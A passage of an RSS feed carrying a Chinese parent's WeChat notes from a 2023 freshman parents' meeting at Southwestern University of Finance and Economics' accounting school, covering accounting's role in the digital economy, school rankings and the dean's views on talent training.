Calibri;mso-font-kerning:0pt;">在<span style="color:#FA0000;">全国会计专业的在校生可能有<span lang="EN-US">260</span>多万，约占所有大学在校生的百分之十</span>！如果这些同学他们未来找不到自己的专业价值，如果会计本身不能为这个社会提供专业价值，我想我自己当老师的这个饭碗也会被取代。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#14324D;mso-font-kerning:18.0pt;">未来专业如何发展？<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">所以我想说，未来职业会怎样的发展啊？<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span lang="EN-US" style="mso-no-proof:yes;"><img class="rich_pages wxw-img" data-ratio="0.5872832369942197" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=8b4e41fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXtAZibWnIoE30DceMHMIdW59FibQvcu4FthwwFicMO3gvskAHzVTibREOUzg%2F640%3Fwx_fmt%3Dpng"/></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">向数字经济的大势对齐<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">我分析的角度，不是从人才培养角度，是先看国家发展大势。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">从国家发展大势我们可以看到，党的<span lang="EN-US">20</span>大报告特别提出，我们现在所处的是一个数字经济的时代，数字经济时代要加快发展数字经济，促进数字经济、实体经济的充分融合，未来要打造具有国际竞争力的数字产业。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">与此同时，我在想，什么叫数字经济？数字经济时代到底代表了什么？国务院在数字经济发展规划中做了官方定义。这个官方定义是说，<span style="color:#FA0000;">数字经济是继对农业经济、工业经济之后的主要经济形态，是以数据资源为关键要素，以现代信息网络为主要载体，以信息通信技术融合应用、全要素数字化转型为重要推动力，促进公平与效率更加统一的新经济形态</span>。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">数字经济和会计有什么关系<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">数据资源和全要素数字化转型<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">这里面有两个最核心的关键词，一个是数据资源是关键要素，第二个是全要素数字化转型。那这两个要素和会计有什么关系？<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#FA0000;mso-font-kerning:0pt;">会计本质上是什么？是一个信息系统，这个信息系统：<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">1 </span><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#FA0000;mso-font-kerning:0pt;">面对所有独特的人财物实物形态、原子形态的信息，</span><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style=""><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">2 </span><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#FA0000;mso-font-kerning:0pt;">能够通过会计独有的确认、计量、报告、分析的特殊功能，把上述实体信息转化成数字信息（比特形态信息）。</span><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">那会计的这种独有的信息生成和使用的功能，对会计能够产生独特的契约功能和估值功能的奠定了重要的基础。也正是因为和契约功能、估值功能才使得会计在各行各业，各个地方，各个岗位上都不可或缺。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">会计是数字经济时代的基础学科<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">数字经济时代本质上是会计时代<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">我们看到，<span style="color:#FA0000;">整个会计的确认、计量、报告、分析，本质上就是把人财物这些原始的信息进行全要素数字化</span>。会计最终形式的、最核心的东西也就是数据资源，所以无论是从这个会计的定义上来看，还是结合数字经济国家的整体趋势上来看，这个会计本身在数字经济时代变成了更加重要的一个基础学科。某种意义上来说，数字经济的时代本质上就是会计的时代，所以各位家长充分的相信，未来学生和这个小朋友选择的这个职业发展绝对是大有可为。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#14324D;mso-font-kerning:18.0pt;">用成绩全面火力覆盖<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">【<span style="color:#FA0000;">每项成绩都很不容易，成绩也非常多！易院长把语速加到最快，激情十足，大珠小珠落玉盘般火力覆盖了一遍</span>】<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">这是实力展示环节，也是吹牛环节，具体内容略，大致是开头的意思：<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">无论从我们专业的人才的培养理念，还是我们师资的专业保障，以及我们的制度设计，学科发展的专业排名，从任何一个角度上来讲，会计学院是在专业领域、学科领域、学校领域都是遥遥领先的、最强的学院之一。<span lang="EN-US"><o:p></o:p></span></span></p><p style=""><span lang="EN-US" style="mso-no-proof:yes;"></span><img class="rich_pages wxw-img" data-ratio="0.5477941176470589" style="font-size: var(--articleFontsize);letter-spacing: 0.034em;" data-type="png" data-w="816" src="https://wechat2rss.xlab.app/img-proxy/?k=6836734e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXtbj6ZjLqHFx8D0WX8Vk4KDCRZiccd8K7e4cQXyuGlpHicmdySgmnTzVgA%2F640%3Fwx_fmt%3Dpng"/></p><p style=""><img class="rich_pages wxw-img" data-ratio="0.5514705882352942" data-w="816" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=3c6a5647&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXt7EGTKMqo9nYQFfB9Bxv7lStUlIUibPvnWOfWe0XeCYajePcZk3ELuhg%2F640%3Fwx_fmt%3Dpng"/></p><p style=""><img class="rich_pages wxw-img" data-ratio="0.5462287104622872" data-w="822" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=25709f85&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXtiar4dOko86bjagNic3fvTx3TichqBVw8L8d8lxHvpS80UQtX4F6npWRYw%2F640%3Fwx_fmt%3Dpng"/></p><p style=""><img class="rich_pages wxw-img" data-ratio="0.5528255528255528" data-w="814" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=fd9008d2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXt5Jd1HwOHJ9sJ5XXLa6yA3tLWJOmag5FU5BXf2AA1uE4JbYpUrAmnuw%2F640%3Fwx_fmt%3Dpng"/></p><p style=""><img class="rich_pages wxw-img" data-ratio="0.5302843016069221" data-w="809" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ce7c70af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINy3NhiarKxwpJ5XFNEmFQMXtS434Nhia5VQvYu3RBH6EBQXgZa5icjybDWrl5FtOYWNiaGicjNSibv1ibHwg%2F640%3Fwx_fmt%3Dpng"/></p><p style=""><span lang="EN-US" style="mso-no-proof:yes;"></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p style=""><span lang="EN-US" style="mso-no-proof:yes;"></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p style=""><span lang="EN-US" style="mso-no-proof:yes;"></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p style=""><span lang="EN-US" style="mso-no-proof:yes;"></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483803">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6cd36b1c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483803%26idx%3D1%26sn%3Db545ea3a8d798a1c4714d539108d5e39%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 05 Oct 2023 22:28:00 +0800</pubDate>
    </item>
    <item>
      <title>马永强教授谈人才培养理念和会计教学改革，西南财经大学会计学院2023新生家长会笔记之一</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483791&amp;idx=1&amp;sn=47ef7220c737fa26a823944d6cf3accd</link>
      <description>大学就是为学生走向社会、持续学习，提供坚实的基础；大学里运动和读书最重要；厚基础、宽口径、破门槛……</description>
      <content:encoded><![CDATA[<p>
<span>新生家长</span> <span>2023-09-08 22:05</span> <span style="display: inline-block;">四川</span>
</p>

<p>大学就是为学生走向社会、持续学习，提供坚实的基础；大学里运动和读书最重要；厚基础、宽口径、破门槛……</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=aba05a84&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzc7sO1lwPn3arcb6QHGyP4qWibWD7THFz7olBPhuBUL4nf3bOoQJNGnJRWCj1S8ribVz8Bb3zkEBkg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><br/></p><p><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">目录</span></strong><span></span><span lang="EN-US"><o:p></o:p></span><span><w:sdtpr></w:sdtpr></span></p><p><span lang="EN-US"><span style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">学校概况：立校近百年，成就令人鼓舞</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">1</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">学院情况：国家级水平，国际化水平，敢为天下先</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">1</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">大学功能定位：为学生走向社会、持续学习，提供坚实的基础</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">2</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">最牛的人：能力和价值观兼优</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">2</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">大学最重要的两件事：运动和读书</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">3</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">人才培养理念：厚基础、宽口径、破门槛</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">3</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">会计会被人工智能取代么？会计专业人士从信息生成转向信息利用</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">4</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">人才培养理念：</span></span>3+1 = <span lang="EN-US" style="font-family:
 宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:
 minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">会计财务</span></span><span lang="EN-US"><span lang="EN-US"> </span></span><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:
 minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">数据分析</span></span><span lang="EN-US"><span lang="EN-US"> </span></span><span lang="EN-US" style="font-family:
 宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:
 minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">智能决策</span></span><span lang="EN-US"><span lang="EN-US"> </span></span><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:
 minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">战略思维</span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"><span style="mso-tab-count:1 dotted;">... </span></span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;">4</span><span style="color:windowtext;display:none;mso-hide:screen;text-decoration:none;text-underline:none;"></span></span><span lang="EN-US" style="font-size:10.5pt;mso-bidi-font-size:11.0pt;line-height:107%;mso-bidi-font-family:&#34;Times New Roman&#34;;mso-bidi-theme-font:minor-bidi;mso-no-proof:yes;"><o:p></o:p></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US">教学改革：提升数学难度、打牢发展基础</span></span></span></p><p><span lang="EN-US" style="mso-no-proof:yes;"><span lang="EN-US" style="font-family:宋体;mso-ascii-font-family:
 Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><span lang="EN-US"><br/></span></span></span></p><p><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">背景</span></strong><span></span></p><p><span lang="EN-US" style="font-size: var(--articleFontsize);letter-spacing: 0.034em;">2023</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;font-family: 宋体;">年</span><span lang="EN-US" style="font-size: var(--articleFontsize);letter-spacing: 0.034em;">9</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;font-family: 宋体;">月</span><span lang="EN-US" style="font-size: var(--articleFontsize);letter-spacing: 0.034em;">7</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;font-family: 宋体;">日，西财会计学院开了一次新生家长会。</span><span style="font-family: 宋体;font-size: var(--articleFontsize);letter-spacing: 0.034em;">副书记张太富主持，充满诗意的开场，带着浓郁的人文情怀，介绍了领导还有我们已经打扰很多次的辅导员和助理辅导员；</span><span style="font-family: 宋体;letter-spacing: 0.034em;color: red;">马永强院长是重头戏，以教育家的胸怀，阐释了大学功能定位和人才培养理念，再具体化到会计的教学改革</span><span style="font-family: 宋体;letter-spacing: 0.034em;"><span></span><span style="font-size: var(--articleFontsize);">；</span></span><span style="font-family: 宋体;font-size: var(--articleFontsize);letter-spacing: 0.034em;">易阳副院长介绍了更详细的教学情况，非常亲和；</span><span style="font-family: 宋体;font-size: var(--articleFontsize);letter-spacing: 0.034em;">最后张太富副书记介绍了值得重视的若干注意事项。</span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">家长会氛围很好，领导团队精诚，风采俨然。我对西财会计敢为人先的办学理念感到幸福。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">这是临时笔记的第一篇，是马永强院长谈话的笔记，这些笔记疏漏错误难免，具体内容以各位老师的发言稿为准。</span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><br/></span></p><p><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">学校概况：立校近百年，成就令人鼓舞</span></strong><span style="font-family:宋体;mso-ascii-font-family:
&#34;Calibri Light&#34;;mso-ascii-theme-font:major-latin;mso-fareast-theme-font:major-fareast;mso-hansi-font-family:&#34;Calibri Light&#34;;mso-hansi-theme-font:major-latin;"></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">源于</span><span lang="EN-US">1925</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">年上海光华大学，抗战内迁到成都。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">进入</span><span lang="EN-US">211/985</span><span style="font-family:宋体;mso-ascii-font-family:
Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">优势学科创新平台、双一流建设。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">各项国际认证和排名非常靠前，成就令人鼓舞。</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;"><br/></span></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">学院情况：国家级水平，国际化水平，教改敢为天下先</span></strong></w:sdt></h2><h2><span style="font-family: 宋体;">学生3600。本科生每年600，今年580，大一转专业会再转入20+，总数到600多人。硕士约1200，博士生约80人。</span></h2><h2><br/></h2><h2>教学突出，软科排名情况。会计第二（上财第一），财务管理第二（外经贸第一），审计第一。三个专业都是前两名，三个专业都是双一流。</h2><h2><br/></h2><h2>国家级教学团队。进入全国高校黄大年式教学团队，唯一进入该团队的部属院校。有国家级教育资源、课程、教材。有国家级手机优秀课程。</h2><h2><br/></h2><h2>国际化方面，AACSB声誉很好，学院是第一家AACSB认证的。国际认证对学生很有利，学生申请国外名校比较容易。大部分海归博士老师来自北美，约45人，是国内人数最多的，这一批科研和教学都非常好，全面超越了年长老师的教学质量。</h2><h2><br/></h2><h2>软科排名高，和毕业生反馈也有很大关系。</h2><h2><br/></h2><h2>人才培养转型全国最早、最好。2018年就首先开设了会计专业大数据实验班。600人里面，有一半是这个方向的。全院除了中外合作办学，所有专业都引入了大数据分析、智能决策。2020年新文科教改评审，投票是我们遥遥领先，受到大家的认可。</h2><p><br/></p><h2><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><w:sdt sdtdocpart="t" docparttype="Table of Contents" docpartunique="t"><strong><span style="letter-spacing: 0.034em;font-family: 宋体;font-size: 20px;">大学功能定位：为学生走向社会、持续学习，提供坚实的基础</span></strong></w:sdt></w:sdt><span lang="EN-US"><o:p></o:p></span></h2><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">什么是优秀的人才？或者说大学的功能定位是什么？</span><span lang="EN-US"><o:p></o:p></span></p><p><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">马云曾经在一次这个企业家大会所说，</span><span lang="EN-US">20</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">年之后的社会中，</span><span lang="EN-US">60%</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">的工作岗位，可能现在还没有出现。什么意思呢？这个社会，你会看到随着技术、随着经济的迭代和快速发展，这个社会对人才的要求越来越高，变化越来越大。我们大学其实很难说，我现在培养的人才更适合于</span><span lang="EN-US">10</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">年，</span><span lang="EN-US">20</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">年之后的这个社会需求。因为像马云说的</span><span lang="EN-US">60%</span><span style="font-family:宋体;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;">的工作岗位还没有出现。</span><span lang="EN-US"><o:p></o:p></span></p><p><span 